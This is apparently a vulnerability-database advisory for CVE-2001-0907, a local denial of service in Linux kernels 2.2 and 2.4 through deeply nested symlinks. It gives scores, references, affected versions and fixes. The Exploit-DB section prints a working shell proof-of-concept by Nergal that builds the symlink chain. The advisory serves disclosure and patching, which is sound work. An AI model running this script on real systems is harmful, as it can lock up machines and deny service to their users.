CVE-2001-0907
CVSS 2.1
Published: 2001-10-18 00:00:00
Last revised: 2016-10-17 22:13:06

[Original] Linux kernel 2.2.1 through 2.2.19, and 2.4.1 through 2.4.10, allows local users to cause a denial of service via a series of deeply nested symlinks, which causes the kernel to spend extra time when trying to access the link.


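[CNNVD] Linux Deep Symbolic Link Denial of Service Vulnerability (CNNVD-200110-116)

        A vulnerability exists in Linux kernel versions 2.2.1 through 2.2.19 and 2.4.1 through 2.4.10. A local user can cause a denial of service by means of a series of deeply nested symbolic links; the vulnerability causes the kernel to spend extra time when trying to access the link.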

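- CVSS (Base Score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interruptions in resource access]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]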

- CPE (Affected Platforms and Products)

cpe:/o:linux:linux_kernel:2.4.10  Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.2.19  Linux Kernel 2.2.19

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0907
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0907
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-116
(Official data source) CNNVD

- Other Links and Resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2001-036.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-036.0
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-035-01
(UNKNOWN)  IMMUNIX  IMNX-2001-70-035-01
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2001:079
(UNKNOWN)  MANDRAKE  MDKSA-2001:079
http://marc.info/?l=bugtraq&m=100343090106914&w=2
(UNKNOWN)  BUGTRAQ  20011018 Flaws in recent Linux kernels
http://marc.info/?l=bugtraq&m=100350685431610&w=2
(UNKNOWN)  BUGTRAQ  20011019 TSLSA-2001-0028
http://www.iss.net/security_center/static/7312.php
(UNKNOWN)  XF  linux-multiple-symlink-dos(7312)
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-082.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:082
http://www.linuxsecurity.com/advisories/other_advisory-1650.html
(UNKNOWN)  ENGARDE  ESA-20011019-02
http://www.novell.com/linux/security/advisories/2001_036_kernel_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:036
http://www.securityfocus.com/bid/3444
(UNKNOWN)  BID  3444

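- Vulnerability Information

Linux Deep Symbolic Link Denial of Service Vulnerability
Low risk  Environmental condition error
2001-10-18 00:00:00 2005-05-13 00:00:00
Local
        A vulnerability exists in Linux kernel versions 2.2.1 through 2.2.19 and 2.4.1 through 2.4.10. A local user can cause a denial of service by means of a series of deeply nested symbolic links; the vulnerability causes the kernel to spend extra time when trying to access the link.

- Advisories and Patches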

        This issue has reportedly been fully fixed in version 2.4.12 of the Linux kernel. A patch that rectifies this issue in version 2.2.19 is also available.
        Vendor specific upgrades are also available.
        Linux kernel 2.2.15
        
        Linux kernel 2.2.17
        
        Linux kernel 2.2.19
        

- Vulnerability Information (21122)

Linux kernel 2.2/2.4 Deep Symbolic Link Denial of Service Vulnerability (EDBID:21122)
linux dos
2001-10-18 Verified
0 Nergal
N/A
source: http://www.securityfocus.com/bid/3444/info

A denial-of-service vulnerability exists in several versions of the Linux kernel.

The problem occurs when a user with local access creates a long chain of symbolically linked files. When the kernel dereferences the symbolic links, the process scheduler is blocked, effectively locking the system until the dereferencing is complete.

#!/bin/sh
# by Nergal
mklink()
{
IND=$1
NXT=$(($IND+1))
EL=l$NXT/../
P=""
I=0
while [ $I -lt $ELNUM ] ; do
        P=$P"$EL"
        I=$(($I+1))
done
ln -s "$P"l$2 l$IND
}

#main program

if [ $# != 1 ] ; then
	echo A numerical argument is required.
	exit 0
fi


ELNUM=$1

mklink 4
mklink 3
mklink 2
mklink 1
mklink 0 /../../../../../../../etc/services
mkdir l5
mkdir l
 

  
		

- Vulnerability Information

9568
Linux Kernel Deep Nested Symlink Local DoS
Local Access Required Denial of Service, Race Condition
Loss of Availability
Exploit Public

- Vulnerability Description

- Timeline

2001-10-18 Unknown
2001-10-18 Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Linux Deep Symbolic Link Denial of Service Vulnerability
Environment Error 3444
No Yes
2001-10-18 12:00:00 2009-07-11 09:06:00
Reported to Bugtraq by Rafal Wojtczuk <nergal@7bulls.com> on October 18, 2001.

- Affected Software Versions

Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
Linux kernel 2.4.1
Linux kernel 2.4
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
+ Mandriva Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
Linux kernel 2.2.16
+ RedHat Linux 7.0
+ Sun Cobalt Qube 3
+ Sun Cobalt RaQ XTR
+ Trustix Secure Linux 1.1
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.1
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
Linux kernel 2.2.12
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.9
Linux kernel 2.2.8
Linux kernel 2.2.7
Linux kernel 2.2.6
Linux kernel 2.2.5
Linux kernel 2.2.4
Linux kernel 2.2.3
Linux kernel 2.2.2
Linux kernel 2.2.1
Linux kernel 2.2

- Unaffected Software Versions

Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11

- Discussion

A denial-of-service vulnerability exists in several versions of the Linux kernel.

The problem occurs when a user with local access creates a long chain of symbolically linked files. When the kernel dereferences the symbolic links, the process scheduler is blocked, effectively locking the system until the dereferencing is complete.

- Exploit

The following exploit is due to Rafal Wojtczuk <nergal@7bulls.com>:

- Solution

This issue has reportedly been fully fixed in version 2.4.12 of the Linux kernel. A patch that rectifies this issue in version 2.2.19 is also available.

Vendor specific upgrades are also available.


Linux kernel 2.2.15

Linux kernel 2.2.17

Linux kernel 2.2.19

Linux kernel 2.4

Linux kernel 2.4.1

Linux kernel 2.4.10

Linux kernel 2.4.2

Linux kernel 2.4.3

Linux kernel 2.4.4

Linux kernel 2.4.5

Linux kernel 2.4.6

Linux kernel 2.4.7

Linux kernel 2.4.8

Linux kernel 2.4.9

- Related References
